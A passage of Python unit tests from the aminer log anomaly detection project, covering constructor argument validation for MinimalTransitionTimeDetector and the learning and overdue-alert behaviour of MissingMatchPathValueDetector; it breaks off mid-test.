Input parameters must be validated in the class.""" self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, ["default"], ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, None, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, "", ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, b"Default", ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, True, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, 123, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, 123.3, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, {"id": "Default"}, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, (), ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, set(), ["/model/value"]) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], [""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], [None]) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], 123) 
self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["default"]) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=[""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], 
id_path_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=[]) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=None) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[]) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=None) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["/model/value"], constraint_list=[""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=[]) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=b"True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id="True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, 
self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=True) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=0) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=100.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], 
["/model/value"], num_log_lines_solidify_matrix="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=100) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=-1) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["/model/value"], time_output_threshold=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=0) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=100) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=100.22) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=1.1) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, 
self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=0) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=1.0) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=0.5) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["/model/value"], persistence_id=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=b"True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode="True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], 
["/model/value"], learn_mode=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=b"True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline="True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=True) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, 
self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], 
learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MissingMatchPathValueDetectorTest.py000066400000000000000000001242221500476301700327120ustar00rootroot00000000000000import unittest from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.MissingMatchPathValueDetector import 
MissingMatchPathValueDetector, MissingMatchPathListValueDetector import time from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement, DummyFirstMatchModelElement from datetime import datetime, timezone from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class MissingMatchPathValueDetectorTest(TestBase): """Unittests for the MissingMatchPathValueDetector.""" expected_string = '%s Interval too large between values\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" def test1receive_atom_MissingMatchPathValueDetector(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ data = b" pid=" match_context = DummyMatchContext(data) fdme = DummyFixedDataModelElement("s1", data) fdme2 = DummyFixedDataModelElement("s2", data) match_element1 = fdme.get_match_element("match", match_context) match_context = DummyMatchContext(data) match_element2 = fdme2.get_match_element("match", match_context) mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True) t = time.time() log_atom1 = LogAtom(fdme.data, ParserMatch(match_element1), t, mmpvd) log_atom2 = LogAtom(fdme.data, ParserMatch(match_element2), t, mmpvd) # learn_mode = True # check if the log atom is not processed if the path does not match. self.assertFalse(mmpvd.receive_atom(log_atom2)) # check if no anomaly is produced if the log atom is received in time. self.assertTrue(mmpvd.receive_atom(log_atom1)) passed_time = t + 3200 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # check if anomalies are detected properly. 
passed_time += 4000 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(passed_time).strftime(self.datetime_format_string), mmpvd.__class__.__name__, 1, "['match/s1']: \"[' pid=']\" overdue 400s (interval 3600)")) self.reset_output_stream() # multiple paths match_context = DummyMatchContext(data + data) seq = DummySequenceModelElement("model", [fdme, fdme2]) match_element = seq.get_match_element("match", match_context) mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/model", "match/model/s1", "match/model/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data + fdme.data, ParserMatch(match_element), 1, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) # learn_mode = False # check if a missing value is created without using the learn_mode (should not be the case). mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=False) self.assertFalse(mmpvd.receive_atom(log_atom2)) self.assertTrue(mmpvd.receive_atom(log_atom1)) passed_time = t + 3200 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # check if anomalies are detected properly. 
passed_time += 4000 log_atom = LogAtom(fdme.data, ParserMatch(match_element1), passed_time, mmpvd) self.assertTrue(mmpvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # combine_values = False # stop_learning_time mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) self.assertTrue(mmpvd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertFalse(mmpvd.learn_mode) # stop_learning_no_anomaly_time mmpvd = MissingMatchPathValueDetector(self.aminer_config, ["match/s1"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=10000) log_atom1.atom_time = t self.assertTrue(mmpvd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom2.atom_time = t + 100 self.assertFalse(mmpvd.receive_atom(log_atom2)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 3800 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 13800 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertTrue(mmpvd.learn_mode) log_atom1.atom_time = t + 13801 self.assertTrue(mmpvd.receive_atom(log_atom1)) self.assertFalse(mmpvd.learn_mode) def test2receive_atom_MissingMatchPathListValueDetector(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # check if a missing value is created by a list without using the learn_mode. 
data = b" pid=" match_context = DummyMatchContext(data + data) fdme = DummyFixedDataModelElement("s1", data) match_element = fdme.get_match_element("match", match_context) t = time.time() mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t + 4000, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(log_atom.atom_time).strftime(self.datetime_format_string), mmplvd.__class__.__name__, 1, "match/s1, match/s2: ' pid=' overdue 400s (interval 3600)")) self.reset_output_stream() # check if the class returns wrong positives on lists, when the time limit should not be passed. mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) past_time = 3200 log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t) + past_time, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # check if missing values are reported correctly. 
mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler], learn_mode=True) log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t), mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) past_time = 4000 log_atom = LogAtom(fdme.data, ParserMatch(match_element), round(t) + past_time, mmplvd) self.assertTrue(mmplvd.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.expected_string % (datetime.fromtimestamp(log_atom.atom_time).strftime(self.datetime_format_string), mmplvd.__class__.__name__, 1, "match/s1, match/s2: ' pid=' overdue 400s (interval 3600)")) # check if no anomaly is produced if the log atom is received in time. match_element = fdme.get_match_element("match3", match_context) mmplvd = MissingMatchPathListValueDetector(self.aminer_config, ["match/s1", "match/s2"], [self.stream_printer_event_handler]) log_atom = LogAtom(fdme.data, ParserMatch(match_element), 1, mmplvd) self.assertFalse(mmplvd.receive_atom(log_atom)) def test3multiple_paths_data_from_file(self): """Test the functionality of the MissingMatchPathValueDetector with multiple paths with more data.""" description = "Test3MissingMatchPathValueDetector" with open("unit/data/multiple_pathes_mmpvd.txt", "rb") as f: data = f.readlines() host1 = DummyFixedDataModelElement("host1", b"host1 ") host2 = DummyFixedDataModelElement("host2", b"host2 ") service1 = 